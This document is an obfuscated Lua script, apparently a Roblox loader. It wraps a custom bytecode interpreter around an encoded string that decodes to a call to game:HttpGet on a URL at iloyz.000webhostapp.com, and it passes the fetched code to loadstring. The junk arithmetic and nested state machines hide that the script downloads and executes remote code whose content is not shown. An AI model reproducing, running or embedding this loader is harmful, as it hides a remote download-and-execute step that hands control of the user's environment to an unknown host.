do
	local v0 = 0;
	local v1;
	local v2;
	local v3;
	local v4;
	local v5;
	local v6;
	local v7;
	local v8;
	local v9;
	local v10;
	local v11;
	local v12;
	local v13;
	local v14;
	local v15;
	local v16;
	while true do
		if (v0 == 4) then
			v13 = select;
			v14 = unpack or table.unpack;
			v15 = tonumber;
			v0 = 5;
		end
		if (v0 == 5) then
			v16 = nil;
			v16 = function(v17, v18, ...)
				local v27 = 0;
				local v28;
				local v29;
				local v30;
				local v31;
				local v32;
				local v33;
				local v34;
				local v35;
				local v36;
				local v37;
				local v38;
				local v39;
				while true do
					if (v27 == 4) then
						v37 = nil;
						v37 = function(...)
							return {...}, v13("#", ...);
						end;
						v38 = nil;
						v38 = function()
							local v48 = 640 - (93 + 547);
							local v49;
							local v50;
							local v51;
							local v52;
							local v53;
							local v54;
							local v55;
							local v56;
							while true do
								if (v48 == 3) then
									v55 = nil;
									v56 = nil;
									v48 = 4;
								end
								if (v48 == (82 - (19 + 63))) then
									v49 = 0 + 0;
									v50 = nil;
									v48 = 1;
								end
								if ((1182 - (631 + 547)) == v48) then
									while true do
										if (v49 == (0 + 0)) then
											local v99 = 1857 - (1260 + 597);
											while true do
												if (v99 == (0 + 0)) then
													v50 = 0 - 0;
													v51 = nil;
													v99 = 1;
												end
												if (v99 == (1987 - (1958 + 28))) then
													v49 = 1 + 0;
													break;
												end
											end
										end
										if (v49 == 1) then
											v52 = nil;
											v53 = nil;
											v49 = 2 - 0;
										end
										if (v49 == (1 + 2)) then
											v56 = nil;
											while true do
												local v107 = 1297 - (392 + 905);
												while true do
													if (v107 ~= 0) then
													else
														local v113 = 0;
														while true do
															if (v113 ~= (2 - 1)) then
															else
																v107 = 2 - 1;
																break;
															end
															if (v113 == (0 + 0)) then
																if (v50 == (1347 - (606 + 739))) then
																	local v120 = 0;
																	while true do
																		if ((1398 - (90 + 1308)) == v120) then
																			local v129 = 1986 - (1309 + 677);
																			while true do
																				if (v129 == 1) then
																					v120 = 1 - 0;
																					break;
																				end
																				if (0 == v129) then
																					for v152 = 1, v55 do
																						local v153 = 0 - 0;
																						local v154;
																						local v155;
																						local v156;
																						local v157;
																						while true do
																							if (v153 == (917 - (520 + 396))) then
																								v156 = nil;
																								v157 = nil;
																								v153 = 2 - 0;
																							end
																							if (0 ~= v153) then
																							else
																								v154 = 0 + 0;
																								v155 = nil;
																								v153 = 1 + 0;
																							end
																							if (v153 ~= (2 + 0)) then
																							else
																								while true do
																									if (v154 == (3 - 2)) then
																										v157 = nil;
																										while true do
																											if (v155 == (0 - 0)) then
																												local v184 = 115 - (55 + 60);
																												local v185;
																												while true do
																													if (v184 == (751 - (468 + 283))) then
																														v185 = 1062 - (208 + 854);
																														while true do
																															if (v185 ~= 1) then
																															else
																																v155 = 2 - 1;
																																break;
																															end
																															if (v185 ~= (661 - (175 + 486))) then
																															else
																																local v194 = 0;
																																while true do
																																	if (v194 == (2 - 1)) then
																																		v185 = 1 - 0;
																																		break;
																																	end
																																	if (v194 == 0) then
																																		v156 = v31();
																																		v157 = nil;
																																		v194 = 1609 - (178 + 1430);
																																	end
																																end
																															end
																														end
																														break;
																													end
																												end
																											end
																											if (v155 == (1 + 0)) then
																												if (v156 == 1) then
																													v157 = v31() ~= (0 + 0);
																												elseif (v156 == 2) then
																													v157 = v34();
																												elseif (v156 == 3) then
																													v157 = v35();
																												end
																												v56[v152] = v157;
																												break;
																											end
																										end
																										break;
																									end
																									if (v154 == (0 - 0)) then
																										local v179 = 0 + 0;
																										while true do
																											if (v179 == 1) then
																												v154 = 1 - 0;
																												break;
																											end
																											if (v179 ~= (0 - 0)) then
																											else
																												local v187 = 1525 - (1176 + 349);
																												while true do
																													if (1 ~= v187) then
																													else
																														v179 = 1;
																														break;
																													end
																													if (v187 ~= (0 - 0)) then
																													else
																														v155 = 0;
																														v156 = nil;
																														v187 = 2 - 1;
																													end
																												end
																											end
																										end
																									end
																								end
																								break;
																							end
																						end
																					end
																					v54[3 + 0] = v31();
																					v129 = 1066 - (355 + 710);
																				end
																			end
																		end
																		if ((3 - 2) ~= v120) then
																		else
																			for v145 = 1, v33() do
																				local v146 = 0 + 0;
																				local v147;
																				local v148;
																				while true do
																					if (v146 == (0 - 0)) then
																						local v158 = 0 - 0;
																						while true do
																							if (v158 ~= 1) then
																							else
																								v146 = 1 + 0;
																								break;
																							end
																							if (v158 == (0 - 0)) then
																								v147 = 0 - 0;
																								v148 = nil;
																								v158 = 1 + 0;
																							end
																						end
																					end
																					if (v146 == (1 + 0)) then
																						while true do
																							if (v147 == (0 - 0)) then
																								v148 = v31();
																								if (v30(v148, 4 - 3, 2 - 1) == (0 + 0)) then
																									local v171 = 0 + 0;
																									local v172;
																									local v173;
																									local v174;
																									local v175;
																									local v176;
																									while true do
																										if (v171 == 1) then
																											v174 = nil;
																											v175 = nil;
																											v171 = 7 - 5;
																										end
																										if (v171 == (725 - (241 + 484))) then
																											v172 = 0 - 0;
																											v173 = nil;
																											v171 = 1 + 0;
																										end
																										if ((7 - 5) ~= v171) then
																										else
																											v176 = nil;
																											while true do
																												if (v172 ~= (0 - 0)) then
																												else
																													v173 = 0 + 0;
																													v174 = nil;
																													v172 = 1;
																												end
																												if (v172 ~= (1 + 1)) then
																												else
																													while true do
																														if (v173 ~= (1 + 0)) then
																														else
																															local v191 = 999 - (236 + 763);
																															while true do
																																if (v191 ~= 1) then
																																else
																																	v173 = 1229 - (1076 + 151);
																																	break;
																																end
																																if (v191 == (1099 - (478 + 621))) then
																																	v176 = {v32(),v32(),nil,nil};
																																	if (v174 == 0) then
																																		local v201 = 1024 - (582 + 442);
																																		local v202;
																																		local v203;
																																		while true do
																																			if ((0 + 0) ~= v201) then
																																			else
																																				v202 = 0;
																																				v203 = nil;
																																				v201 = 1766 - (106 + 1659);
																																			end
																																			if (v201 ~= (1 - 0)) then
																																			else
																																				while true do
																																					if (v202 ~= (1581 - (1443 + 138))) then
																																					else
																																						v203 = 0 - 0;
																																						while true do
																																							if (v203 == (881 - (84 + 797))) then
																																								v176[4 - 1] = v32();
																																								v176[4 + 0] = v32();
																																								break;
																																							end
																																						end
																																						break;
																																					end
																																				end
																																				break;
																																			end
																																		end
																																	elseif (v174 == (1 + 0)) then
																																		v176[1 + 2] = v33();
																																	elseif (v174 == (4 - 2)) then
																																		v176[7 - 4] = v33() - ((2 - 0) ^ 16);
																																	elseif (v174 == (859 - (124 + 732))) then
																																		local v206 = 0 + 0;
																																		local v207;
																																		local v208;
																																		while true do
																																			if (v206 == (1 + 0)) then
																																				while true do
																																					if (v207 ~= (0 + 0)) then
																																					else
																																						v208 = 0 - 0;
																																						while true do
																																							if (v208 ~= (0 + 0)) then
																																							else
																																								v176[3] = v33() - ((6 - 4) ^ (35 - 19));
																																								v176[1883 - (958 + 921)] = v32();
																																								break;
																																							end
																																						end
																																						break;
																																					end
																																				end
																																				break;
																																			end
																																			if (v206 == (0 + 0)) then
																																				v207 = 0 - 0;
																																				v208 = nil;
																																				v206 = 1;
																																			end
																																		end
																																	end
																																	v191 = 2 - 1;
																																end
																															end
																														end
																														if (0 ~= v173) then
																														else
																															local v192 = 0 - 0;
																															while true do
																																if (v192 ~= (0 + 0)) then
																																else
																																	v174 = v30(v148, 2, 3);
																																	v175 = v30(v148, 4, 2 + 4);
																																	v192 = 1 + 0;
																																end
																																if (v192 == (3 - 2)) then
																																	v173 = 432 - (283 + 148);
																																	break;
																																end
																															end
																														end
																														if (v173 == (3 + 0)) then
																															if (v30(v175, 16 - (10 + 3), 3) == (712 - (324 + 387))) then
																																v176[2 + 2] = v56[v176[3 + 1]];
																															end
																															v51[v145] = v176;
																															break;
																														end
																														if (v173 == 2) then
																															if (v30(v175, 1 - 0, 2 - 1) ~= (1 - 0)) then
																															else
																																v176[6 - 4] = v56[v176[2]];
																															end
																															if (v30(v175, 2, 2) ~= (2 - 1)) then
																															else
																																v176[6 - 3] = v56[v176[246 - (240 + 3)]];
																															end
																															v173 = 3;
																														end
																													end
																													break;
																												end
																												if ((1 + 0) == v172) then
																													local v190 = 186 - (47 + 139);
																													while true do
																														if (v190 == (0 + 0)) then
																															v175 = nil;
																															v176 = nil;
																															v190 = 693 - (392 + 300);
																														end
																														if (v190 == (2 - 1)) then
																															v172 = 2 + 0;
																															break;
																														end
																													end
																												end
																											end
																											break;
																										end
																									end
																								end
																								break;
																							end
																						end
																						break;
																					end
																				end
																			end
																			v50 = 3;
																			break;
																		end
																	end
																end
																if (v50 == 3) then
																	local v121 = 0;
																	local v122;
																	while true do
																		if (v121 == (860 - (638 + 222))) then
																			v122 = 1435 - (986 + 449);
																			while true do
																				local v149 = 0 - 0;
																				while true do
																					if (v149 ~= (0 + 0)) then
																					else
																						if (v122 == 1) then
																							return v54;
																						end
																						if (v122 == 0) then
																							local v163 = 365 - (260 + 105);
																							while true do
																								if (v163 == (0 + 0)) then
																									for v180 = 1 - 0, v33() do
																										v52[v180 - (1 + 0)] = v38();
																									end
																									for v182 = 645 - (553 + 91), v33() do
																										v53[v182] = v33();
																									end
																									v163 = 1794 - (471 + 1322);
																								end
																								if (v163 ~= (1533 - (1245 + 287))) then
																								else
																									v122 = 1 + 0;
																									break;
																								end
																							end
																						end
																						break;
																					end
																				end
																			end
																			break;
																		end
																	end
																end
																v113 = 2 - 1;
															end
														end
													end
													if (v107 == (1 + 0)) then
														if (v50 == 0) then
															local v114 = 0 - 0;
															local v115;
															while true do
																if (v114 == (0 + 0)) then
																	v115 = 0;
																	while true do
																		if (v115 ~= 1) then
																		else
																			v53 = {};
																			v50 = 1 + 0;
																			break;
																		end
																		if ((0 + 0) ~= v115) then
																		else
																			local v130 = 186 - (163 + 23);
																			while true do
																				if (v130 ~= (0 - 0)) then
																				else
																					v51 = {};
																					v52 = {};
																					v130 = 1013 - (702 + 310);
																				end
																				if (v130 == 1) then
																					v115 = 1;
																					break;
																				end
																			end
																		end
																	end
																	break;
																end
															end
														end
														if (v50 == (1 - 0)) then
															local v116 = 794 - (204 + 590);
															while true do
																if (v116 == (1 + 0)) then
																	v56 = {};
																	v50 = 2 - 0;
																	break;
																end
																if (v116 == (244 - (10 + 234))) then
																	local v123 = 0 - 0;
																	local v124;
																	while true do
																		if ((1456 - (13 + 1443)) ~= v123) then
																		else
																			v124 = 594 - (506 + 88);
																			while true do
																				if (v124 == (1 + 0)) then
																					v116 = 1 - 0;
																					break;
																				end
																				if ((0 - 0) == v124) then
																					local v151 = 0;
																					while true do
																						if (v151 == (1 + 0)) then
																							v124 = 2 - 1;
																							break;
																						end
																						if (v151 == (42 - (37 + 5))) then
																							v54 = {v51,v52,nil,v53};
																							v55 = v33();
																							v151 = 1 - 0;
																						end
																					end
																				end
																			end
																			break;
																		end
																	end
																end
															end
														end
														break;
													end
												end
											end
											break;
										end
										if (2 ~= v49) then
										else
											local v100 = 0 - 0;
											local v101;
											while true do
												if (v100 ~= 0) then
												else
													v101 = 846 - (240 + 606);
													while true do
														if (v101 == (771 - (204 + 567))) then
															local v117 = 1871 - (1303 + 568);
															while true do
																if (1 ~= v117) then
																else
																	v101 = 965 - (454 + 510);
																	break;
																end
																if (v117 ~= (0 + 0)) then
																else
																	v54 = nil;
																	v55 = nil;
																	v117 = 597 - (589 + 7);
																end
															end
														end
														if (v101 == 1) then
															v49 = 3;
															break;
														end
													end
													break;
												end
											end
										end
									end
									break;
								end
								if (v48 == (771 - (403 + 367))) then
									v51 = nil;
									v52 = nil;
									v48 = 2;
								end
								if (v48 == (1619 - (975 + 642))) then
									v53 = nil;
									v54 = nil;
									v48 = 2 + 1;
								end
							end
						end;
						v27 = 5;
					end
					if (1 == v27) then
						v30 = function(v40, v41, v42)
							if v42 then
								local v84 = (v40 / ((1 + 1) ^ (v41 - (1 + 0)))) % ((1 + 1) ^ (((v42 - (1 - 0)) - (v41 - (1 - (1236 - (758 + 478))))) + (120 - (44 + 75))));
								return v84 - (v84 % (2 - 1));
							else
								local v85 = (1439 - (279 + 1160)) + 0;
								local v86;
								while true do
									if (v85 == (676 - (433 + 243))) then
										v86 = (1907 - ((888 - 595) + 1612)) ^ (v41 - (908 - (32 + 875)));
										return (((v40 % (v86 + v86)) >= v86) and ((3040 - (1351 + 582)) - ((1569 - 683) + 220))) or (0 - 0);
									end
								end
							end
						end;
						v31 = nil;
						v31 = function()
							local v57 = 51 - (48 + 3);
							local v58;
							while true do
								if (v57 == (0 - 0)) then
									v58 = v2(v17, v28, v28);
									v28 = v28 + (2 - 1);
									v57 = 1460 - (1165 + 294);
								end
								if ((1 + 0) == v57) then
									return v58;
								end
							end
						end;
						v32 = nil;
						v27 = 2;
					end
					if (5 == v27) then
						v39 = nil;
						v39 = function(v43, v44, v45)
							local v59 = v43[1];
							local v60 = v43[2];
							local v61 = v43[3];
							return function(...)
								local v76 = 0;
								local v77;
								local v78;
								local v79;
								local v80;
								local v81;
								while true do
									if (v76 == 1) then
										v79 = {...};
										v80 = v13("#", ...) - 1;
										v76 = 2;
									end
									if (v76 == 2) then
										v81 = nil;
										v81 = function()
											local v89 = v59;
											local v90 = v60;
											local v91 = v61;
											local v92 = v37;
											local v93 = {};
											local v94 = {};
											local v95 = {};
											for v102 = 0 - 0, v80 do
												if ((v102 >= v91) or ((500 + 2126) >= (6027 - 1641))) then
													v93[v102 - v91] = v79[v102 + (3 - 2)];
												else
													v95[v102] = v79[v102 + (2 - 1)];
												end
											end
											local v96 = (v80 - v91) + (3 - 2);
											local v97;
											local v98;
											while true do
												local v103 = 0 + (0 - 0);
												local v104;
												while true do
													if ((v103 == 0) or (((228 - 105) + 1654) < (16 + (865 - 628)))) then
														v104 = 0 + 0;
														while true do
															if ((v104 == (1 + 0)) or ((249 + 3628) < (2873 + 303))) then
																if ((v98 <= ((136 + 262) - (357 + 39))) or (980 > (304 + 707))) then
																	if ((v98 <= 0) or ((1106 - ((323 - (59 + 209)) + 720)) >= (507 - 151))) then
																		local v125 = 0 + 0;
																		local v126;
																		local v127;
																		local v128;
																		while true do
																			if ((v125 == (1638 - (1271 + 367))) or (((8045 - (1889 + 99)) - 3562) == (2266 + 1396))) then
																				v126 = 0 - 0;
																				v127 = nil;
																				v125 = 2 - 1;
																			end
																			if (((2 - 1) == v125) or ((5692 - (1478 + 92)) < 3322)) then
																				v128 = nil;
																				while true do
																					if ((v126 == 1) or (((7465 - 5460) + 1253) < 1882)) then
																						v95[v127 + 1] = v128;
																						v95[v127] = v128[v97[2 + 2]];
																						break;
																					end
																					if ((v126 == (747 - (471 + 276))) or ((4075 - (422 + 53 + 12)) == (621 + 2360))) then
																						local v162 = 1050 - (474 + 576);
																						while true do
																							if ((0 == v162) or ((2391 + 2386) <= (4832 - (892 + 13)))) then
																								v127 = v97[2];
																								v128 = v95[v97[3 - 0]];
																								v162 = (361 + 40) - (396 + 4);
																							end
																							if (((8342 - 4498) == (14591 - 10747)) and ((2 - 1) == v162)) then
																								v126 = 1;
																								break;
																							end
																						end
																					end
																				end
																				break;
																			end
																		end
																	elseif ((v98 > (2 - 1)) or ((10 + 482) == 3691)) then
																		local v131 = 0 + 0;
																		local v132;
																		local v133;
																		local v134;
																		local v135;
																		local v136;
																		while true do
																			if (((1064 - (129 + 8)) < (4054 - (441 + 1059))) and (v131 == (5 - 3))) then
																				v136 = nil;
																				while true do
																					if (((5710 - (215 + 874)) >= (3877 - (1160 + 151))) and (v132 == (1 + 0))) then
																						local v164 = 0 + 0;
																						while true do
																							if ((v164 == (1 + 0)) or (((4623 - (115 + 995)) + 666) <= (2164 - (666 + 497)))) then
																								v132 = 1 + (177 - (84 + 92));
																								break;
																							end
																							if ((3882 > ((2992 - (663 + 529)) + 1258)) and (v164 == 0)) then
																								v78 = (v135 + v133) - (1 + 0);
																								v136 = 0 + 0;
																								v164 = 1;
																							end
																						end
																					end
																					if ((4206 < (6047 - (1092 + 500))) and (v132 == (1 + 1))) then
																						for v168 = v133, v78 do
																							local v169 = 0 - (0 - 0);
																							local v170;
																							while true do
																								if (((17186 - (5796 + 7891)) > (896 - 313)) and (v169 == (0 - 0))) then
																									v170 = 0 + 0 + 0;
																									while true do
																										if (((2358 - (173 + 953)) == 1232) and (v170 == 0)) then
																											v136 = v136 + (1 - 0);
																											v95[v168] = v134[v136];
																											break;
																										end
																									end
																									break;
																								end
																							end
																						end
																						break;
																					end
																					if ((v132 == (0 + 0)) or ((4101 - (83 + 1636)) == (2292 - (430 + 900)))) then
																						v133 = v97[2];
																						v134, v135 = v92(v95[v133](v14(v95, v133 + (4 - 3), v97[3])));
																						v132 = 1 + 0;
																					end
																				end
																				break;
																			end
																			if ((v131 == 0) or ((1219 - (863 + 270)) > (4435 + 488))) then
																				v132 = 129 - (27 + 102);
																				v133 = nil;
																				v131 = 1725 - (1337 + 387);
																			end
																			if (((3035 - (466 + 115 + 62)) < (12388 - 9573)) and (v131 == (3 - 2))) then
																				v134 = nil;
																				v135 = nil;
																				v131 = 1724 - (631 + 1091);
																			end
																		end
																	else
																		v95[v97[2 + 0]]();
																	end
																elseif ((v98 <= (3 + 1)) or ((2569 + 65) >= (15163 - 11620))) then
																	if ((1052 == ((10445 - 8056) - 1337)) and (v98 == (11 - 8))) then
																		do
																			return;
																		end
																	else
																		v95[v97[4 - 2]] = v97[1739 - (728 + 1008)];
																	end
																elseif (((1386 + 462 + 168) < (4533 - 1647)) and (v98 == (682 - (434 + 243)))) then
																	local v139 = 0 - 0;
																	local v140;
																	local v141;
																	local v142;
																	while true do
																		if ((v139 == 1) or ((3018 + 955) < 3240)) then
																			v142 = nil;
																			while true do
																				if (((2620 - 1465) >= (17 + 20)) and ((221 - (89 + 132)) == v140)) then
																					v141 = 0;
																					v142 = nil;
																					v140 = 1 + 0;
																				end
																				if ((v140 == (1 - 0)) or (419 == (7787 - 3300))) then
																					while true do
																						if ((v141 == 0) or ((4884 - 3222) <= (169 + 573 + 590))) then
																							v142 = v97[199 - (191 + 6)];
																							v95[v142] = v95[v142](v14(v95, v142 + (2 - (188 - (81 + 106))), v78));
																							break;
																						end
																					end
																					break;
																				end
																			end
																			break;
																		end
																		if ((((10795 - 8532) - (190 + 1484)) <= (3929 - (98 + (1970 - (156 + 954))))) and (0 == v139)) then
																			v140 = (1609 - 1025) - (447 + 137);
																			v141 = nil;
																			v139 = 1771 - (206 + 1564);
																		end
																	end
																else
																	v95[v97[2]] = v45[v97[7 - 4]];
																end
																v77 = v77 + 1;
																break;
															end
															if (((1026 + 2182) < (10198 - (16592 - 9987))) and (v104 == (0 - 0))) then
																v97 = v89[v77];
																v98 = v97[(372 - (25 + 22)) - (7 + 317)];
																v104 = 2 - 1;
															end
														end
														break;
													end
												end
											end
										end;
										v76 = 3;
									end
									if (v76 == 3) then
										A, B = v37(v12(v81));
										if not A[1] then
											local v105 = 0;
											local v106;
											while true do
												if (v105 == 0) then
													v106 = v43[4][v77] or "?";
													error("Script error at [" .. v106 .. "]:" .. A[2]);
													break;
												end
											end
										else
											return v14(A, 2, B);
										end
										break;
									end
									if (v76 == 0) then
										v77 = 1;
										v78 = -1;
										v76 = 1;
									end
								end
							end;
						end;
						return v39(v38(), {}, v18)(...);
					end
					if (3 == v27) then
						v34 = function()
							local v62 = v33();
							local v63 = v33();
							local v64 = 1 + 0 + 0;
							local v65 = (v30(v63, 1011 - (382 + 628), 20) * ((7 - 5) ^ (11 + 14 + 7))) + v62;
							local v66 = v30(v63, 18 + 3, 144 - 113);
							local v67 = ((v30(v63, (236 - 169) - (854 - (751 + 68))) == (3 - 2)) and -(895 - (99 + 795))) or ((2536 - (261 + 479)) - (1248 + 547));
							if (v66 == (0 + 0 + 0)) then
								if (v65 == (0 - 0)) then
									return v67 * (0 - 0);
								else
									v66 = 1299 - (36 + (2272 - (703 + 307)));
									v64 = 0 - 0;
								end
							elseif (v66 == 2047) then
								return ((v65 == (1072 - (398 + 674))) and (v67 * ((1 + 0) / 0))) or (v67 * NaN);
							end
							return v9(v67, v66 - 1023) * (v64 + (v65 / ((1252 - (595 + 655)) ^ (31 + 21))));
						end;
						v35 = nil;
						v35 = function(v46)
							local v68;
							if not v46 then
								v46 = v33();
								if (v46 == (0 + 0)) then
									return "";
								end
							end
							v68 = v4(v17, v28, (v28 + v46) - (1 + 0));
							v28 = v28 + v46;
							local v69 = {};
							for v82 = 1376 - (1044 + 331), #v68 do
								v69[v82] = v3(v2(v4(v68, v82, v82)));
							end
							return v7(v69);
						end;
						v36 = v33;
						v27 = 4;
					end
					if (v27 == 0) then
						v28 = 1;
						v29 = nil;
						v17 = v5(v4(v17, 5), "..", function(v47)
							if (v2(v47, 2) == 79) then
								v29 = v1(v4(v47, 1, 1));
								return "";
							else
								local v87 = 0;
								local v88;
								while true do
									if (0 == v87) then
										v88 = v3(v1(v47, 16));
										if v29 then
											local v108 = v6(v88, v29);
											v29 = nil;
											return v108;
										else
											return v88;
										end
										break;
									end
								end
							end
						end);
						v30 = nil;
						v27 = 1;
					end
					if (v27 == 2) then
						v32 = function()
							local v70, v71 = v2(v17, v28, v28 + (6 - 4));
							v28 = v28 + (775 - (169 + 604));
							return (v71 * (583 - 327)) + v70;
						end;
						v33 = nil;
						v33 = function()
							local v72, v73, v74, v75 = v2(v17, v28, v28 + ((4935 - 3067) - (899 + 966)));
							v28 = v28 + ((5854 - 4515) - (434 + 901));
							return (v75 * (3745239 + 13031977)) + (v74 * (194948 - 129412)) + (v73 * ((127 + 316) - 187)) + v72;
						end;
						v34 = nil;
						v27 = 3;
					end
				end
			end;
			v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574032A3O00682O7470733A2O2F696C6F797A2E3O30776562686F7374612O702E636F6D2F69476174655761792F5F00083O0012063O00013O001206000100023O00202O000100010003001204000300044O0002000100034O00055O00022O00013O000100012O00033O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00", v10(), ...);
			break;
		end
		if (v0 == 2) then
			v7 = table.concat;
			v8 = table.insert;
			v9 = math.ldexp;
			v0 = 3;
		end
		if (v0 == 3) then
			v10 = getfenv or function()
				return _ENV;
			end;
			v11 = setmetatable;
			v12 = pcall;
			v0 = 4;
		end
		if (v0 == 0) then
			v1 = tonumber;
			v2 = string.byte;
			v3 = string.char;
			v0 = 1;
		end
		if (v0 == 1) then
			v4 = string.sub;
			v5 = string.gsub;
			v6 = string.rep;
			v0 = 2;
		end
	end
end
